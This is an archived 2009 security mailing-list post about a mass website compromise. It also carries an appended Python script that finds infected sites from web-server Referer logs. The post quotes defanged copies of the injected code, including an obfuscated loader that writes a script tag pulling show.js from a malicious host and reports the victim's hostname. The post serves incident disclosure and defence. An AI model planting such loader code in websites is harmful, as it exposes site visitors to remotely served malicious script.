[nsp-sec] compromised websites again (crew.abnc-portal.com)
Greg Schwimer
gschwimer at godaddy.com
Mon May 11 10:11:02 EDT 2009
Thanks... digging into it right now.
=====================================================================
Hi teams,

there was a malicious javascript at <hXXp://crew.abnc-portal.com/show.js>.

A reference to this URL has been injected into thousands of compromised websites like this (remove XXX) - usually before the closing BODY tag:
<!-- ad --><scrXXXipt language=javascript
src="hXXp://crew.abnc-portal.com/show.js"></scrXXXipt><!-- /ad -->
or
<!-- ad --><!-- ADS Blok v.0.3 --><scrXXXipt language=javaXXXscript>
funcXXXtion sADS(sIteId) {
var thisHome=document;
var sIteName=thisHome.location.hostname;
var adsurl='crew%2eabnc-portal%2ecom%2F';
var adScript='%3Cscr'+'ipt src="http%3A%2F%2F'+adsurl+'show.js?c=';
thisHome.write(unescape(adScript+sIteId+'&s='+sIteName+'"%3E%3C/scr'+'ipt%3E'));
}
sADS("CI-002643-3");
</scrXXXipt><!-- ADS Blok v.0.3 --><!-- /ad -->
For an unknown reason, the IP address for crew.abnc-portal.com has been changed to 88.80.216.114 on 2009-04-22.
88.80.216.114 is hosting the Swiss security blog 'abuse.ch'.
This server is not malicious and has not been compromised!

By analyzing the Referer headers from the requests for /show.js that hit 88.80.216.114, we were able to identify compromised websites that have the above mentioned javascript injected into one or more pages.

Please find attached a list of 5.079 compromised hosts that showed up in the Referers from 2009-05-01 until 2009-05-08.
There might be some "false positives" like google.com when users visited a compromised website using Google translate.
Cheers,
Thomas
=====================================================================
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security
counter-measures.
_______________________________________________
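Added example, not part of the original e-mails: a sketch of the Referer analysis the quoted message describes, run over constructed access-log lines. The Apache combined log format, the sample hosts and IPs, the fallback to the s= query parameter written by the second injection variant, and the google.com review list are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined format); hosts and IPs are placeholders.
SAMPLE_LOG = '''\
192.0.2.10 - - [01/May/2009:10:00:01 +0200] "GET /show.js HTTP/1.1" 404 210 "http://shop.example.org/index.html" "Mozilla/4.0"
192.0.2.11 - - [01/May/2009:10:00:05 +0200] "GET /show.js?c=CI-000000-0&s=forum.example.net HTTP/1.1" 404 210 "-" "Mozilla/4.0"
192.0.2.12 - - [02/May/2009:11:12:13 +0200] "GET /show.js HTTP/1.1" 404 210 "http://translate.google.com/translate?u=http://blog.example.com/" "Mozilla/5.0"
192.0.2.13 - - [02/May/2009:11:15:00 +0200] "GET /index.html HTTP/1.1" 200 5120 "http://www.example.edu/links.html" "Mozilla/5.0"
192.0.2.14 - - [03/May/2009:09:30:44 +0200] "GET /show.js HTTP/1.1" 404 210 "http://SHOP.example.org/cart.php" "Mozilla/4.0"
'''

# Request path, status, size, then the quoted Referer field.
LINE_RE = re.compile(r'"(?:GET|HEAD) (?P<path>\S+) [^"]*" \d{3} \S+ "(?P<ref>[^"]*)"')

# Assumed list of intermediaries whose hostname in a Referer needs manual review.
PROXY_SUFFIXES = ("google.com",)

def referring_hosts(log_text, script_path="/show.js", proxies=PROXY_SUFFIXES):
    """Return (hits, review): Counters of hosts whose pages requested the script."""
    hits, review = Counter(), Counter()
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group("path"))
        if target.path != script_path:
            continue  # unrelated request to the same server
        host = urlsplit(m.group("ref")).hostname or ""
        if not host:
            # No usable Referer: fall back to the hostname the injected
            # sADS() variant appends as s=<hostname>.
            host = parse_qs(target.query).get("s", [""])[0].lower()
        if not host:
            continue
        is_proxy = any(host == p or host.endswith("." + p) for p in proxies)
        (review if is_proxy else hits)[host] += 1
    return hits, review

if __name__ == "__main__":
    hits, review = referring_hosts(SAMPLE_LOG)
    for host, count in hits.most_common():
        print(f"{count:6d}  {host}")
    print("needs manual review:", dict(review))
```

Hosts in the review bucket are not discarded: the proxied page itself may carry the injection, so its URL has to be checked by hand.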